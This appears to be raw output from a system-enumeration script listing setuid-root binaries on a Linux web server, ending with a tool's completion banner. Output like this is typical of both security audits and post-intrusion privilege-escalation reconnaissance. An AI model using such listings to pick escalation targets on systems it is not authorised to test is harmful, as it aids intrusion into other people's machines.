-rwsr-xr-x 1 root root 75K Dec 8 2011 /bin/mount
-rwsr-xr-x 1 root root 36K Jul 19 2011 /bin/ping6
-rwsr-x--- 1 root wheel 35K Jun 22 2012 /bin/su
-rwsr-xr-x 1 root root 320K Aug 16 2012 /opt/suphp/sbin/suphp
-rws--x--x 1 root root 14K Aug 13 2012 /usr/libexec/pt_chown
-rwsr-xr-x 1 root root 220K Jan 25 2012 /usr/libexec/openssh/ssh-keysign
-rwsr-xr-x 1 root root 8.8K Mar 7 2012 /usr/sbin/usernetctl
-rwsr-xr-x 1 root root 936K Oct 17 21:04 /usr/sbin/exim
-rwsr-xr-x 1 root root 36K Dec 7 2011 /usr/bin/newgrp
-rwsr-xr-x 1 root root 81K Jul 19 2011 /usr/bin/quota
-rwsr-xr-x 1 root root 47K Jul 19 2011 /usr/bin/crontab
-rws--x--x 1 root root 20K Dec 8 2011 /usr/bin/chfn
---s--x--x 2 root root 208K Sep 23 2011 /usr/bin/sudo
-rwsr-xr-x 1 root root 53K Jan 30 2012 /usr/bin/at
-rwsr-xr-x 1 root root 70K Dec 7 2011 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 65K Dec 7 2011 /usr/bin/chage
-rwsr-xr-x 1 root root 31K Feb 22 2012 /usr/bin/passwd
---s--x--x 2 root root 208K Sep 23 2011 /usr/bin/sudoedit
-rwsr-xr-x 1 root root 20K Aug 16 2012 /usr/local/apache.backup/bin/suexec
-rwsr-xr-x 1 root root 20K Aug 16 2012 /usr/local/apache/bin/suexec
[!] ALL JOBS DONE, Have a good day!